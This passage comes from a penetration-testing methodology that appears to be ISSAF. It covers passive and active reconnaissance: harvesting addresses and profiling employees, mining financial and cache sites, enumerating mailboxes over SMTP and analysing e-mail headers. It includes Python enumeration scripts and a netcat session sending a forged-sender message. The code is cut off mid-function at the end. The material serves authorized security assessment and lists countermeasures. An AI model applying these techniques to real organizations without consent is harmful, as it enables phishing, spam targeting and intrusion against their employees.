well-behaved crawlers, not an access control.
• Remove confidential/sensitive content found through web searching. Alternatively,
place that content behind appropriate access control mechanisms.
Links
• Watching_the_Watchers_II-2 by j0hnny
• http://www.google.com/help/operators.html
• http://www.robotstxt.org/wc/exclusion.html
Tools
• Any browser
Remarks
Removed content might still appear in web search engines for some time due to web
caches.
Knowing the syntax, limitations and commands of each web search engine used is
important to get the best results; using several web search engines will also improve
results.
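The e-mail harvesting and employee-profiling steps above lend themselves to automation. The following Python script is an added example, not part of the ISSAF text or its listed tools: it pulls the target's addresses out of saved search-result text, votes on the address structure using every "Name <address>" pair it finds, and applies the winning structure to names for which no address was found (the structure test described again in B.1.18). The domain target.example, the sample text and the list of candidate structures are constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample: text as it might be saved from search-result pages and a
# few cached pages mentioning the (fictional) target domain. Not real data.
SEARCH_RESULTS = """
Contact: John Smith <john.smith@target.example>, Sales Dept, +1 555 0100
Posted by Jane Doe (jane.doe@target.example) in comp.security.firewalls
From: "Robert Brown" <robert.brown@target.example>
Tom Jones <tjones@target.example> (legacy account, still active)
Webmaster: webmaster@target.example
Please e-mail Alice.Wong@Target.Example for support questions
... hostmaster@isp.example is responsible for the netblock ...
"""
TARGET_DOMAIN = "target.example"

ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", re.I)
# "First Last <addr>" or "First Last (addr)", optionally with a closing quote
# after the name as in RFC 2822 display names.
NAME_ADDR_RE = re.compile(
    r"([A-Z][a-z]+)\s+([A-Z][a-z]+)\"?\s*[<(]\s*([\w.+-]+@[\w.-]+)\s*[>)]")

# Address structures commonly met in organizations (assumption: extend per target).
PATTERNS = {
    "first.last": "{first}.{last}",
    "first_last": "{first}_{last}",
    "first-last": "{first}-{last}",
    "flast": "{f}{last}",
    "firstl": "{first}{l}",
    "first": "{first}",
    "last": "{last}",
}


def harvest_addresses(text, domain):
    """Sorted, lower-cased addresses at `domain` found anywhere in `text`."""
    found = {a.lower() for a in ADDR_RE.findall(text)}
    return sorted(a for a in found if a.endswith("@" + domain.lower()))


def _render(pattern, first, last):
    return PATTERNS[pattern].format(first=first, last=last, f=first[0], l=last[0])


def infer_pattern(text, domain):
    """Vote on the address structure using every (name, address) pair in `text`.
    Returns (best_pattern, votes); best_pattern is None if no pair matched."""
    votes = Counter()
    for first, last, addr in NAME_ADDR_RE.findall(text):
        local, _, dom = addr.lower().partition("@")
        if dom != domain.lower():
            continue
        for name in PATTERNS:
            if _render(name, first.lower(), last.lower()) == local:
                votes[name] += 1
    best = votes.most_common(1)[0][0] if votes else None
    return best, votes


def guess_addresses(full_names, pattern, domain):
    """Apply an inferred structure to names whose address was not found."""
    guesses = {}
    for full in full_names:
        parts = full.lower().split()
        guesses[full] = f"{_render(pattern, parts[0], parts[-1])}@{domain}"
    return guesses


if __name__ == "__main__":
    print(harvest_addresses(SEARCH_RESULTS, TARGET_DOMAIN))
    best, votes = infer_pattern(SEARCH_RESULTS, TARGET_DOMAIN)
    print(best, dict(votes))
    print(guess_addresses(["Maria Garcia", "Li Wei"], best, TARGET_DOMAIN))
```

The vote matters: a single legacy account (tjones) should not override the convention the other three pairs agree on, and the minority pattern is still worth keeping as a second guess when the first one fails verification.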
B.1.9 Search Securities & Exchange Commission and Finance Sites
Description
It is trivial to gather the financial information of a public company to complete its profile.
This gives the attacker a better image of the target. Public organizations in the United States
are bound to file 10-Q and 10-K reports.
Process
• Check for merger information
  o At the time of mergers, the chances of inappropriate security handling are higher
  o Higher chances of social engineering
  o The merged network may disclose some interesting information
• Check for recent activities
• Check for partner information
Analysis/Conclusion/Observation
Information gathered through these means might indicate:
• Times at which the infrastructure might be more vulnerable to attacks (e.g. IT
integration after a merger)
• Probable system relationships (e.g. an attacker compromises a partner with lower security
and then tries to work its way in through system trust relationships)
Countermeasures
• Apply appropriate security measures to all connections with partners (don't take for
granted that their security will be enough)
• Include special information security procedures in all IT changes during mergers
and acquisitions
Links
Securities & Exchange Commission
United States
• http://www.sec.gov/
• http://www.freeedgar.com
India
• http://www.sebi.gov.in/
Pakistan
• http://www.secp.gov.pk/
Nigeria
• http://www.secngr.org/
Finance Sites
• http://finance.yahoo.com
• http://www.hoovers.com
• http://www.companysleuth.com
Tools
• Any web browser
Remarks
Access to some specific details of financial operations might be restricted. The assessor
should limit her/his search to public information.
B.1.10 Search System/Network Survey Sites
Description
System/network survey sites, e.g. Netcraft (http://www.netcraft.com), give excellent
information about uptimes, operating systems, web servers and netblocks used.
Process
• Gather web server information and find out what web server / operating system the site is
running
• Find the IP address and net-block owner
• Note the SSL version and other information, such as the certificate currently in use
Analysis/Conclusion/Observation
Information gathered through this test will give details regarding the brands of operating
systems and web servers, uptime, and traffic volume. This information will be used to better
tune other tests (e.g. port scanning and vulnerability scanning).
Countermeasures
Change the default banners provided by network services visible from the Internet.
Links
• www.netcraft.com
Tools
• Any web browser
Remarks
Searching at www.netcraft.com allows only a limited number of searches from a specific IP
address each day.
Although the proposed countermeasures are by no means strong, they will help the other
security controls in place by delaying an attacker or forcing him to perform noisier
reconnaissance and scanning activities. This, in turn, will increase the probability that illegal
activities are detected promptly.
B.1.11 Search Uptime Statistics Sites
Description
Search for information on uptime in graphs and statistics available on the Internet.
Process
Sometimes you will find the Big Brother monitoring administration panel on the target
website. This can be found via search engines and/or archives of the target website.
• Search for uptime or network statistics through search engines
• Collect IP addresses and network diagrams that might be mentioned on the statistics
page
• Collect any other relevant information on the statistics page (e.g. O.S. and
application brands)
• Take note of reboots of the system, since they could indicate an important security
event (i.e. the last reboot might indicate the last time a critical security update was
applied, for some operating systems).
Analysis/Conclusion/Observation
Uptime information should not be available to the public, since it would help an attacker
determine important events and information useful for a more successful attack.
For a consultant assessing an organization, this information can be useful to prepare
specific tests with a higher probability of success.
Countermeasures
• Move statistics information from public networks to the internal network and restrict
access so that only authorized personnel can consult/edit it.
Links
• http://maclawran.ca
• Big Brother System and Network Monitor
Tools
• Any web browser
Remarks
B.1.12 Search on P2P Networks
Description
Most of today's P2P networks are decentralized. Because of this decentralized nature, it is
hard to stop the spread of information once it has been shared. Many P2P clients (e.g.
e Mule, KaZaA, Grokster, BitTorrent, Soulseek, eDonkey) are available on the Web.
Process
• Search for the target's information (confidential documents)
• Search for the target's products
• Search for the target's network/resources used as P2P components
Analysis/Conclusion/Observation
P2P client programs might establish connections through which some resources are
accessible from the Internet. Resources and networks that were protected by firewalls are
becoming increasingly vulnerable to hacking and malware attacks through P2P connections
initiated from the inside.
It is therefore important to regulate and limit the use of P2P networks to authorized
activities only.
Countermeasures
The spread of information cannot be stopped completely, but it can be limited by sabotage.
• Spread fake files: spreading bogus files with names similar to the file whose spread one
wants to limit may discourage some P2P users.
• Monitor source download information, contact ISPs, single out and sue people in
court
• Practice bounty hunting, encouraging people to denounce others who download a
file
• Block P2P traffic at your border gateway(s) and/or on your internal filters.
Links
• eMule
• KaZaA
• Grokster
• BitTorrent
• Soulseek
• eDonkey
Tools
• Any web browser
Remarks
Even if the assessment will only search for public information, make sure that the P2P
accounts to be assessed are used on machines located at, and property of, the target
organization. Check, for example, that the IP address of the equipment belongs to the
organization's netblocks or resolves to its domain (if the protocol exposes it).
B.1.13 Search on Internet Relay Chat (IRC)
Description
The identification of users chatting in IRC rooms could provide alternative means to get
inside a network, evading perimeter controls (i.e. firewall and IDS). Find users using IRC
and try to exploit this to get information or an alternate entrance to the corporate network.
Process
• Find employees lurking around in IRC
• Search for information in IRC support rooms
• Search IRC logs
• Search for employees running IRC bots from the target's network
Analysis/Conclusion/Observation
Similarly to P2P networks, Internet Relay Chat connections provide not only a means to talk
with other people but also to share files. Several worms exploit known vulnerabilities or
make use of social engineering to spread through this protocol.
The use of IRC within a company might also indicate a probable violation of corporate
policy (if it is being done from equipment that is property of the target organization).
Countermeasures
• Block the IRC protocol at the border (i.e. routers, firewalls)
• Establish clear and precise policies regarding the use of this kind of protocol
Links
Tools
• Any IRC client
Remarks
Try to be passive while performing this test (i.e. do not actively question users using social
engineering). Active testing should be done at other stages of the assessment.
B.1.14 Search Underground Sites
Description
Search underground sources of information for data relevant to the target organization's
assessment.
Process
Identify relevant underground information sources (e.g. hacking groups with records of
hacks against financial organizations might be useful if the target organization is a bank);
search for relevant information in places like:
• E-mail lists
• IRC channels and chats
• Web forums
• FTP sites
While performing these tasks, take into consideration:
• Law enforcement agencies might be watching as well (i.e. be extremely careful with
anything you say/write; preferably, don't say anything, just listen and read)
• Underground groups are usually closed and very selective; do not attempt to force
your way in
• Never reveal your target's name or give any information that might reveal its
identity. The same recommendation applies to your own identity and employer.
Analysis/Conclusion/Observation
Information gathered through these means might be extremely useful for certain
organizations, under some assessment engagements and circumstances. The kind of
information that could be useful includes (although it is not restricted to):
• Information on hacking attempts (successful or not) by other parties (e.g. hackers)
• Information on new hacking techniques and tools relevant to the assessment (i.e.
that apply to the target's current infrastructure, which you might have identified through
other enumeration tests)
• Confidential/restricted/unexpected information about the target organization or
related organizations that you might find in the hands of third parties (e.g. e-mail
lists for spamming that include a huge number of e-mail addresses from the target
organization)
• Fraud plans or plots involving the target organization or related organizations.
Countermeasures
Organizations should:
• Restrict confidential information leaks by implementing appropriate policies and
security controls
• Report illegal activities to law enforcement where their involvement is necessary
Links
Tools
• Web browsers
• FTP, telnet and IRC clients
Remarks
This check is not recommended for small penetration tests. For large companies, the
assessor should make sure that the target organization approves this kind of test and is
informed of any relevant information immediately.
B.1.15 Search News Groups (NNTP) and E-mail Lists
Description
Search product-specific mailing lists. You will likely find valuable information there.
Download all product-specific e-mails and perform an offline search.
Process
• Download all NNTP groups relating to the technology in place
• Perform an offline search based on e-mail address, name, phone number, etc.
• Copy relevant mailing list posts from public sites (i.e. posts that discuss technology
or problems at the assessed organization).
Analysis/Conclusion/Observation
Check all discovered information for mails which contain system information or other
relevant information (e.g. a sysadmin troubleshooting something).
Countermeasures
• Keep your employees from using their business e-mail addresses to sign up for groups
and mailing lists
• Set up policies that require employees to avoid disclosing infrastructure information
on public sites
Links
• news://msnews.microsoft.com
• news://news.support.veritas.com/dnewsweb.exe
• http://www.google.com (discussion groups)
• http://www.securityfocus.com (forums)
Tools
• Any web browser (most public e-mail lists are available on the web)
Remarks
This activity can be very time consuming (i.e. reading through all posts from employees
working for the target company), depending on the volume of messages in the lists. The
assessor should be very selective with the lists he or she chooses in order to increase the
probability of finding something useful while decreasing the time required to read all posts.
B.1.16 Search Index Sites
Description
Index sites maintain copies of web sites. They can be used to gather information without
going to the target, and also to gather information from previous copies of web sites.
Process
• Search for common web servers and download the cached content available on index
sites
• Compare with the current content of the site and note differences
• Analyze and document changes (e.g. date of last update, changes in scripts)
Analysis/Conclusion/Observation
Differences between current content and cached content may indicate useful things, such
as:
• Frequency of web content updates
• New or deprecated content
• New or deprecated forms or functions (new functions/scripts might be vulnerable,
still under development, or give some indication of other new related systems).
Countermeasures
Organizations should restrict web spiders from accessing and storing web forms and
restricted information (e.g. by setting the appropriate parameters in the robots.txt file).
Links
• www.dogpile.com
• www.alexa.com
• www.archive.org
Tools
• Any web browser
Remarks
Depending on the caching technique used by the indexing service, the copy of the site could
be complete or partial.
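Comparing a cached copy with the live site by eye misses small changes, so the following added Python example (not from the ISSAF text) extracts the parts of a page an assessor cares about from both copies, form actions with their input names, script sources and link targets, and reports what appeared, disappeared or changed. Both HTML snippets are constructed; in practice the cached copy comes from the index site and the current one from the target.

```python
from html.parser import HTMLParser

# Constructed snapshots of one (fictional) page: the copy held by an index/cache
# site and the version currently served. Neither is real content.
CACHED_HTML = """<html><body>
<form action="/cgi-bin/login.pl" method="post"><input name="user"><input name="pass"></form>
<script src="/js/menu.js"></script>
<a href="/support/">Support</a> <a href="/sales/">Sales</a>
</body></html>"""

CURRENT_HTML = """<html><body>
<form action="/cgi-bin/login.pl" method="post"><input name="user"><input name="pass"><input name="otp"></form>
<form action="/beta/upload.php" method="post" enctype="multipart/form-data"><input type="file" name="doc"></form>
<script src="/js/menu.js"></script><script src="/js/tracker.js"></script>
<a href="/support/">Support</a> <a href="/partners/portal/">Partner portal</a>
</body></html>"""


class SurfaceExtractor(HTMLParser):
    """Collect form actions (with their input names), script sources and link
    targets: the things whose appearance or change is worth following up."""

    def __init__(self):
        super().__init__()
        self.forms = {}          # action -> set of input names
        self.scripts = set()
        self.links = set()
        self._current_form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current_form = a.get("action", "")
            self.forms.setdefault(self._current_form, set())
        elif tag == "input" and self._current_form is not None:
            self.forms[self._current_form].add(a.get("name", ""))
        elif tag == "script" and a.get("src"):
            self.scripts.add(a["src"])
        elif tag == "a" and a.get("href"):
            self.links.add(a["href"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current_form = None


def extract_surface(html):
    p = SurfaceExtractor()
    p.feed(html)
    p.close()
    return {"forms": {k: sorted(v) for k, v in p.forms.items()},
            "scripts": p.scripts, "links": p.links}


def diff_surfaces(cached_html, current_html):
    """Report what appeared, disappeared or changed between the two copies."""
    old, new = extract_surface(cached_html), extract_surface(current_html)
    common_forms = set(old["forms"]) & set(new["forms"])
    return {
        "new_forms": sorted(set(new["forms"]) - set(old["forms"])),
        "removed_forms": sorted(set(old["forms"]) - set(new["forms"])),
        "changed_forms": sorted(a for a in common_forms
                                if old["forms"][a] != new["forms"][a]),
        "new_scripts": sorted(new["scripts"] - old["scripts"]),
        "removed_scripts": sorted(old["scripts"] - new["scripts"]),
        "new_links": sorted(new["links"] - old["links"]),
        "removed_links": sorted(old["links"] - new["links"]),
    }


if __name__ == "__main__":
    for key, value in diff_surfaces(CACHED_HTML, CURRENT_HTML).items():
        if value:
            print(f"{key}: {value}")
```

In the constructed sample the login form gained an "otp" field, a new upload form appeared under /beta/ and a link to a partner portal replaced the sales page: exactly the "new or deprecated forms or functions" the analysis above asks the assessor to document and to test in later phases.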
B.1.17 Search Employees' Personal Web Sites
Description
By searching for names, personal e-mail addresses, hobbies, and other personal
information, you can find employees' personal websites.
Process
• Search for employees' names (i.e. names included in web pages that show up when
searching for information on the target organization).
• Identify employees' personal web sites
• Gather information from these websites
For example, try http://Firstname.Lastname.com and so on (.net, .org, with hyphen, etc.).
Analysis/Conclusion/Observation
Employees tend to include information related to their work and employer on their personal
web sites and blogs. This information can be useful for subsequent phases of the
assessment.
Countermeasures
• Implement security policies that restrict the type and amount of information about the
target organization that people are allowed to disclose
Links
• www.dogpile.com
• www.alexa.com
• www.google.com
Tools
• Any web browser
Remarks
ACTIVE INFORMATION GATHERING
Examining organizations using publicly available sources is legal in many countries, but
active information gathering may not be.
B.1.18 E-mail Systems – User Account Enumeration
Description
Identify valid e-mail accounts by connecting to the e-mail server of the target company.
Process
Some e-mail addresses should have been identified using the passive information gathering
tests; use this information to identify additional e-mail addresses:
• Identify the user account structure (i.e. how the e-mail addresses are formed; e.g.
<name>-<lastname>@domain, <initial><lastname>@<department>.domain)
• Create a list of names and test the probable structure (i.e. with the names of employees
whose e-mail address was not found on the web, test the structure pattern)
• Connect to the target's e-mail server (SMTP or POP3) and verify the existence of
such addresses (e.g. using the "VRFY" and "EXPN" commands, or by issuing "MAIL FROM:"
and "RCPT TO:" with candidate addresses and comparing the server's responses)
Examples/Results
# nc -vv mailserver.target 25
mailserver.target [X.X.X.X] 25 (smtp) open
220 TARGET Mail Server
EHLO ASSESSOR
250-mailserver.target
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-AUTH LOGIN PLAIN GSSAPI
250-AUTH=LOGIN PLAIN GSSAPI
250-XVERP
250 8BITMIME
verify username
502 Error: command not implemented
mail from:<assessor@pentester.company>
250 Ok
rcpt to:<username@any_other.testdomain>
554 <username@any_other.testdomain>: Recipient address rejected: Relay access denied
rcpt to:<invalid_username@correctdomain.target>
550 <invalid_username@correctdomain.target>: User unknown
rcpt to:<invalid-username2@correctdomain.target>
550 <invalid-username2@correctdomain.target>: User unknown
rcpt to:<correct-username@correctdomain.target>
250 Ok
rcpt to:<correct-username2@correctdomain.target>
250 Ok
quit
221 Bye
sent xxxx, rcvd xxxx
Analysis/Conclusion/Observation
Similar techniques are used to create spam lists and for social engineering/phishing attacks.
The existence of an easily identifiable structure facilitates the use of e-mail addresses for
illegal activities like those mentioned before. However, this is not a critical vulnerability, and
many organizations must have such structures to comply with standardization
requirements.
The information will nevertheless be useful to the assessor, since it provides her/him with
potential attack vectors for other tests. E.g. you will be able to obtain and verify the
existence of an e-mail address for an important person (CIO, CEO, etc.) whose name you
found but whose e-mail address was not readily available.
Countermeasures
• Some organizations might be willing to add a random element to the e-mail address
structure to make spamming and phishing activities more difficult to accomplish and
easier to detect. While this measure is to some degree effective, it also has an
aesthetic impact on the e-mail address and is therefore avoided in many
organizations.
• Implement policies to restrict the disclosure and use of e-mail addresses (e.g. some
companies no longer include e-mail addresses on business cards; instead,
they ask their employees to write it down only if it is required for business
communications).
• Deploy intrusion detection to spot e-mail gathering activities on the e-mail
server (e.g. connections using commands such as "VRFY", or probing of several
existent and non-existent e-mail addresses through "MAIL FROM:" / "RCPT TO:"
commands).
• Put filters in place to thwart information gathering (e.g. disable unnecessary SMTP
commands, disable e-mail relaying capabilities, use connection timeouts, etc.)
Links
Tools
• Rcpt2 (SMTP "RCPT TO" enumeration tool)
• Vrfy (SMTP "VRFY" command enumeration tool)
• Netcat and telnet for manual tests
• Custom scripts for automated tests
Remarks
The SMTP command is "VRFY"; "verify" is not a valid command, so the 502 response in the
example above says nothing about whether VRFY is disabled (the EHLO response actually
advertises it). Servers configured as catch-all, or servers that only reject unknown users
after the DATA stage, answer 250 to every "RCPT TO:" and make this enumeration
unreliable; always compare the responses for a known-good and a known-bad address
before trusting the results.
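The "RCPT TO:" technique shown in the transcript above, as an added Python example that is not part of the ISSAF text or its listed tools. So that it runs offline it starts a tiny fake SMTP server on the loopback interface that behaves like a common hardened configuration (VRFY disabled, relaying refused, unknown users rejected at RCPT time); the fake server, the domain target.example and the user list are constructed assumptions. The enumerator itself uses only the standard smtplib client and works unchanged against a real server, within the agreed scope.

```python
import smtplib
import socket
import threading

# ---- Constructed stand-in for the target's mail server -----------------------
# Not any real product's output: just enough SMTP to exercise the enumerator.
def _serve(conn, valid_users, domain):
    def reply(line):
        conn.sendall((line + "\r\n").encode())

    reply("220 mail.target.example ESMTP")
    buf = b""
    while True:
        while b"\r\n" not in buf:
            chunk = conn.recv(1024)
            if not chunk:
                conn.close()
                return
            buf += chunk
        raw, buf = buf.split(b"\r\n", 1)
        cmd = raw.decode(errors="replace")
        verb = cmd.split(":")[0].split(" ")[0].upper()
        if verb in ("EHLO", "HELO"):
            reply("250-mail.target.example")
            reply("250 PIPELINING")
        elif verb == "VRFY":
            reply("502 5.5.1 VRFY command is disabled")
        elif verb in ("MAIL", "RSET"):
            reply("250 2.1.0 Ok")
        elif verb == "RCPT":
            addr = cmd.split("<", 1)[1].split(">", 1)[0].lower()
            user, _, dom = addr.partition("@")
            if dom != domain:
                reply("554 5.7.1 Relay access denied")
            elif user in valid_users:
                reply("250 2.1.5 Ok")
            else:
                reply("550 5.1.1 User unknown")
        elif verb == "QUIT":
            reply("221 2.0.0 Bye")
            conn.close()
            return
        else:
            reply("502 5.5.2 Error: command not recognized")


def start_fake_smtp(valid_users, domain="target.example"):
    """Start the fake server on an ephemeral loopback port; returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_serve, args=(conn, set(valid_users), domain),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


# ---- The enumeration itself --------------------------------------------------
def enumerate_rcpt(host, port, domain, candidates, sender="assessor@pentester.example"):
    """Classify candidate local parts by the server's RCPT TO response.

    Returns {"vrfy_usable": bool, "users": {local_part: verdict}} where verdict is
    "valid", "invalid", "relay-denied" or "unknown(<code>)"."""
    results = {}
    if not candidates:
        return {"vrfy_usable": False, "users": results}
    with smtplib.SMTP(host, port, local_hostname="assessor", timeout=10) as smtp:
        smtp.ehlo()
        # VRFY is quicker when it works, but most servers disable it or answer 252.
        code, _ = smtp.verify(f"{candidates[0]}@{domain}")
        vrfy_usable = code in (250, 251)
        smtp.mail(sender)
        for i, user in enumerate(candidates):
            if i and i % 20 == 0:
                # Reset the envelope so per-transaction recipient limits are not hit.
                smtp.rset()
                smtp.mail(sender)
            code, _ = smtp.rcpt(f"{user}@{domain}")
            if code in (250, 251):
                results[user] = "valid"
            elif code in (550, 551, 553):
                results[user] = "invalid"
            elif code == 554:
                results[user] = "relay-denied"
            else:
                results[user] = f"unknown({code})"
    return {"vrfy_usable": vrfy_usable, "users": results}


if __name__ == "__main__":
    port = start_fake_smtp({"jane.doe", "jdoe", "postmaster"})
    print(enumerate_rcpt("127.0.0.1", port, "target.example",
                         ["jane.doe", "jdoe", "john.smith", "postmaster"]))
```

The "relay-denied" verdict is the check from the transcript: a 554 for a foreign domain proves the server is not an open relay and that probes must use the target's own domain. The periodic RSET keeps a long candidate list from tripping per-message recipient limits, which on a real server would otherwise start returning 452 codes that the "unknown" branch would then surface.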
B.1.19 SMTP Headers Analysis – E-mail Received from Target
Description
Extract useful information from the SMTP headers included in legitimate e-mail sent from
the target.
Process
Obtain e-mails from the target organization:
• Search the web for e-mails with full headers coming from the target organization
• Send e-mail to addresses with automated responses (e.g. mailing list
majordomos and client support addresses)
• Apply social engineering to an e-mail address with the intent of obtaining a legitimate
response
• Use e-mail communication from the target organization (e.g. e-mails from the people
in charge of the assessment project directed to the assessors)
Analyze the headers and correlate the information:
• Extract e-mail server and gateway addresses, paying special attention to names,
since they often reveal useful information (e.g. "Received: from antivirusgw
(antivirusgw.domain.target [XXX.XXX.XXX.XXX])")
• Record the mail path (i.e. the mail servers between the sender and the receiver)
• Record IP addresses and correlate them against information gathered through other tests
(e.g. an IP address that shows up in the headers might have been previously
identified as a server with another function, such as a DNS server or a firewall. This
might help identify multipurpose servers and application proxies).
Analysis/Conclusion/Observation
Information in e-mail headers can be useful to:
• Identify network resources
• Map the perimeter of the target organization's network
• Identify characteristics, uses and relationships of some network resources of the
target organization
Countermeasures
To reduce unnecessary information leakage, organizations should ensure that:
• Names of network resources included in e-mail headers do not give more
information than necessary (i.e. avoid names that describe the purpose, brand, location
or applications of these resources to the Internet; use aliases for internal
administration where appropriate)
• Internal network addresses are not exposed (i.e. the mail gateway should strip or
rewrite "Received:" lines that carry the reserved address ranges used for internal
networking)
• Single points of failure are avoided whenever possible (i.e. servers that host several
important network services, like mixing DNS, SMTP and web)
Links
• http://www.stopspam.org/email/headers.html
• http://www.faqs.org/faqs/net-abuse-faq/spam-faq/
Tools
• Any web browser
• E-mail client capable of showing e-mail headers
Remarks
B.1.20 SMTP Headers Analysis – Bounced E-mail
Description
Elicit bounced e-mail and analyze the SMTP headers included in the replies from the mail
servers' postmaster accounts.
Process
Generate and send e-mails that will elicit bounces:
• Send e-mail to non-existent recipients at the target organization's domain (i.e. elicit
responses from the mail servers)
• Send a huge e-mail to a valid e-mail address so that it will be rejected because of its
size
Analyze the headers and correlate the information:
• Extract e-mail server and gateway addresses, paying special attention to names,
since they often reveal useful information (e.g. "Received: from antivirusgw
(antivirusgw.domain.target [XXX.XXX.XXX.XXX])")
• Record the mail path (i.e. the mail servers between the sender and the receiver)
• Record IP addresses and correlate them against information gathered through other tests
(e.g. an IP address that shows up in the headers might have been previously
identified as a server with another function, such as a DNS server or a firewall. This
might help identify multipurpose servers and application proxies).
Analysis/Conclusion/Observation
Information in e-mail headers can be useful to:
• Identify network resources
• Map the perimeter of the target organization's network
• Identify characteristics, uses and relationships of some network resources of the
target organization
Countermeasures
To reduce unnecessary information leakage, organizations should ensure that:
• Names of network resources included in e-mail headers do not give more
information than necessary (i.e. avoid names that describe the purpose, brand, location
or applications of these resources to the Internet; use aliases for internal
administration where appropriate)
• Internal network addresses are not exposed (i.e. the mail gateway should strip or
rewrite "Received:" lines that carry the reserved address ranges used for internal
networking)
• Single points of failure are avoided whenever possible (i.e. servers that host several
important network services, like mixing DNS, SMTP and web)
Links
• http://www.stopspam.org/email/headers.html
• http://www.faqs.org/faqs/net-abuse-faq/spam-faq/
Tools
• Scripts and tools to create altered e-mails
• E-mail client capable of showing e-mail headers
Remarks
The bounce is sent to the envelope sender ("MAIL FROM:") address, which must therefore be
one the assessor controls. Many mail servers reject unknown recipients or oversized
messages during the SMTP dialogue itself (see B.1.18) instead of accepting the message and
bouncing it later; in that case no bounce message, and no internal "Received:" line, is ever
generated, and the rejection text seen on the wire is all the information obtained.
B.1.21 SMTP Headers Analysis – Read Receipt
Description
Elicit read receipts from legitimate e-mail accounts and analyze the SMTP headers included in
the resulting receipt messages, which the recipient's mail client sends back through the
target's mail infrastructure.
Process
Generate spoofed e-mail to elicit read receipts:
• Create an e-mail with a spoofed "From:" header so that the sender appears known to the
recipient (e.g. use an address from the same domain as the recipient). The envelope
sender ("MAIL FROM:") should retain the assessor's legitimate e-mail address.
• Alternatively, spoof the "From:" header with a legitimate address from the same
domain as the recipient but add a "Reply-To:" field with an e-mail address belonging to
the assessor.
• Activate the read receipt option (the "Disposition-Notification-To:" header defined in
RFC 2298; the older, non-standard "Read-Receipt-To:" header is still honoured by some
clients, so both are set below)
Examples/Results
# nc -vv mailserver.target 25
mailserver.target [X.X.X.X] 25 (smtp) open
220 TARGET Mail Server
EHLO ASSESSOR
250-mailserver.target
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-AUTH LOGIN PLAIN GSSAPI
250-AUTH=LOGIN PLAIN GSSAPI
250-XVERP
250 8BITMIME
mail from:<assessor@pentester.company>
250 Ok
rcpt to:<correct-username@correctdomain.target>
250 Ok
data
354 Enter mail, end with a single ".".
From: "Trusted User" <forged@correctdomain.target>
To: "Correct Username" <correct-username@correctdomain.target>
Read-Receipt-To: "Trusted User" <assessor@pentester.company>
Disposition-Notification-To: "Trusted User" <assessor@pentester.company>
Subject: Read Receipt Header Test

This text should motivate "Correct Username" to confirm reception of the e-mail message.
.
250 2.5.0 Ok.
quit
221 Bye
sent xxxx, rcvd xxxx
Analysis/Conclusion/Observation
Information in e-mail headers can be useful to:
• Identify network resources
• Map the perimeter of the target organization's network
• Identify characteristics, uses and relationships of some network resources of the
target organization
Countermeasures
To reduce unnecessary information leakage, organizations should ensure that:
• Names of network resources included in e-mail headers do not give more
information than necessary (i.e. avoid names that describe the purpose, brand, location
or applications of these resources to the Internet; use aliases for internal
administration where appropriate)
• Internal network addresses are not exposed (i.e. the mail gateway should strip or
rewrite "Received:" lines that carry the reserved address ranges used for internal
networking)
• Single points of failure are avoided whenever possible (i.e. servers that host several
important network services, like mixing DNS, SMTP and web)
• Policies are in place that require all users to report suspicious activity immediately
• Users receive basic training that helps them identify forged e-mails (e.g. viruses,
phishing attacks, scams, social engineering, etc.)
Links
• http://www.stopspam.org/email/headers.html
• http://www.faqs.org/faqs/net-abuse-faq/spam-faq/
• http://www.ietf.org/rfc/rfc2298.txt
• http://www.ninebynine.org/IETF/Messaging/HdrRegistry/mail/Read-Receipt-To.html
Tools
• Scripts and tools to create altered e-mails
• E-mail client capable of showing e-mail headers
Remarks
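The header analysis described in B.1.19, B.1.20 and B.1.21 is the same whichever way the message was elicited, so one added Python example (not part of the ISSAF text) serves all three: it parses the "Received:" chain into hops in delivery order, flags hops whose source address lies in the reserved ranges used for internal networking, collects host names (including the one leaked by the Message-ID) and notes the software each relay reveals. The sample message, its host names and the list of "descriptive" name fragments are constructed assumptions; the final hop, the assessor's own MX, is filtered out by domain.

```python
import email
import ipaddress
import re

# Constructed sample message standing in for a reply or bounce received from the
# target organization (host names are fictional; 203.0.113.0/24 is documentation
# address space).
SAMPLE_MESSAGE = """Received: from mailgw.target.example (mailgw.target.example [203.0.113.10])
\tby mx.pentester.example (Postfix) with ESMTPS id 4ABCDEF
\tfor <assessor@pentester.example>; Mon, 01 Jan 2007 10:00:00 +0000
Received: from antivirusgw (antivirusgw.target.example [10.1.2.3])
\tby mailgw.target.example (Postfix) with ESMTP id 123456
Received: from EXCH01.corp.target.example ([192.168.10.5]) by antivirusgw with Microsoft SMTPSVC(6.0.3790.1830)
Message-ID: <20070101095959.A1B2C3@EXCH01.corp.target.example>
From: Someone <someone@target.example>
To: assessor@pentester.example
Subject: Re: assessment kick-off

Thanks, see you Monday.
"""

# "from <helo> (<reverse-dns> [<ip>]) by <host> (<software>) with <protocol or product>"
FROM_RE = re.compile(r"\bfrom\s+(\S+)(?:\s+\(([^()\[\]]*?)\s*\[([^\]]+)\]\))?", re.I)
BY_RE = re.compile(r"\bby\s+(\S+)(?:\s+\(([^()]*)\))?", re.I)
WITH_RE = re.compile(r"\bwith\s+(.+?)(?=\s+id\s|\s+for\s|;|$)", re.I | re.S)
PROTOCOL_TOKENS = {"smtp", "esmtp", "esmtps", "esmtpa", "esmtpsa", "lmtp"}
# RFC 1918, loopback and IPv6 ULA: the "reserved address ranges used for
# internal networking" the countermeasures above refer to.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
                  "fc00::/7", "::1/128")]
# Host name fragments that describe a box's role or product (assumption: a
# starting list to tune per engagement).
DESCRIPTIVE = ("antivirus", "av", "exch", "gw", "fw", "proxy", "relay", "spam")


def is_internal(ip_text):
    """True for addresses in INTERNAL_NETS, False otherwise, None if unparsable."""
    try:
        addr = ipaddress.ip_address(ip_text.replace("IPv6:", ""))
    except ValueError:
        return None
    return any(addr in net for net in INTERNAL_NETS)


def parse_received_path(raw_message):
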